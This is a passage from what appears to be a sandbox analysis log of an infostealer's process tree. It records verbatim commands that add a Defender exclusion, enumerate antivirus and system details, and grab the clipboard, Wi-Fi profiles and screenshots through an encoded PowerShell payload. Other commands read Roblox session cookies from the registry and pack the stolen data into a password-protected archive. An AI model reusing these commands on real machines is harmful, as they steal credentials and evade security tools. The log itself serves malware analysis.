    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:3256
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4325.tmp\4326.tmp\4327.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        
        PID:4772
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2604
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:5480
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:5836
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq robloxplayerbeta.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:6084
      - C:\Windows\system32\find.exe
        
        find /I /N "robloxplayerbeta.exe"
        6⤵
        
        PID:3708
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:1508
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1548
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5796"
    3⤵
    PID:1440
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5796
      4⤵
      Kills process with taskkill
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    PID:5196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:6120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Loads dropped DLL
      PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4876
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5772
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2748
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5428
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:116
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\edjhx3zt\edjhx3zt.cmdline"
        5⤵
        
        PID:5452
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C5C.tmp" "c:\Users\Admin\AppData\Local\Temp\edjhx3zt\CSC5B43F6AAF935491FA1BF5A8C66CD879.TMP"
        6⤵
        
        PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4248
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5268
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3936
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2124
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5348
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1836
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5132
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1260"
    3⤵
    PID:4480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1260
      4⤵
      Kills process with taskkill
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3740"
    3⤵
    PID:1548
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3740
      4⤵
      Kills process with taskkill
      PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 372"
    3⤵
    PID:5236
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 372
      4⤵
      Kills process with taskkill
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1272"
    3⤵
    PID:5852
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1272
      4⤵
      Kills process with taskkill
      PID:5200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3740"
    3⤵
    PID:5520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6120
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3740
      4⤵
      Kills process with taskkill
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1004"
    3⤵
    PID:5660
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3452
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1004
      4⤵
      Kills process with taskkill
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 372"
    3⤵
    PID:3632
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 372
      4⤵
      Kills process with taskkill
      PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1932"
    3⤵
    PID:5380
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1932
      4⤵
      Kills process with taskkill
      PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1272"
    3⤵
    PID:5456
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1272
      4⤵
      Kills process with taskkill
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4176"
    3⤵
    PID:6088
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4176
      4⤵
      Kills process with taskkill
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1004"
    3⤵
    PID:3484
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1004
      4⤵
      Kills process with taskkill
      PID:932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2508"
    3⤵
    PID:1572
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2508
      4⤵
      Kills process with taskkill
      PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1932"
    3⤵
    PID:5260
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5968
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1932
      4⤵
      Kills process with taskkill
      PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1228"
    3⤵
    PID:5400
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1228
      4⤵
      Kills process with taskkill
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4176"
    3⤵
    PID:5112
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4176
      4⤵
      Kills process with taskkill
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5092"
    3⤵
    PID:3780
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5092
      4⤵
      Kills process with taskkill
      PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2508"
    3⤵
    PID:4368
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2508
      4⤵
      Kills process with taskkill
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1228"
    3⤵
    PID:5456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6008
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1228
      4⤵
      Kills process with taskkill
      PID:5196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5092"
    3⤵
    PID:1060
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5092
      4⤵
      Kills process with taskkill
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1260"
    3⤵
    PID:5128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5260
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1260
      4⤵
      Kills process with taskkill
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1312
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57802\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\ZSuWm.zip" *"
    3⤵
    PID:4040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5252
  - - C:\Users\Admin\AppData\Local\Temp\_MEI57802\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI57802\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\ZSuWm.zip" *
      4⤵
